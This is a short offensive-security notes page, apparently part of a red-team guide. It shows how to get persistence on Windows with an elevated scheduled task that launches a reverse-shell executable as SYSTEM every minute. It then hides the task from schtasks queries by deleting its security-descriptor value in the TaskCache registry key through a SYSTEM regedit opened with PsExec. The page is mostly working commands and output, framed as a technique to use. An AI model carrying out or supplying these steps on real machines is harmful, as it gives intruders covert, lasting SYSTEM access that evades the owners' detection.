Scheduled Tasks (Elevated )

Let's create a task that runs a reverse shell every single minute. In a real-world scenario, you wouldn't want your payload to run so often:

C:\>schtasks /create /sc minute /mo 1 /tn Persistence /tr "C:\Windows\Tasks\shell.exe" /ru SYSTEM
SUCCESS: The scheduled task "Persistence" has successfully been created.

Where: schtasks /create /? - for usage

/SC - schedule Specifies the schedule frequency. Valid schedule types: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT.
/mo 1 - every single minute
/RU - username

Verify service created:

C:\>schtasks /query /tn Persistence

Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Persistence                              4/3/2024 9:41:00 PM    Ready

We will got shell after 1 minute

To hide our task, let's delete the SD value for the "Persistence" task we created before. The security descriptors of all scheduled tasks are stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree

We will use psexec to open Regedit with SYSTEM privileges to delete SD value

C:\> PsExec64.exe -i -s regedit

C:\>schtasks /query /tn Persistence
ERROR: The system cannot find the file specified.

However, the tasks still execute as the same.

PreviousRun / RunOnce (Elevated)NextPrivilege Escalation

Last updated 1 year ago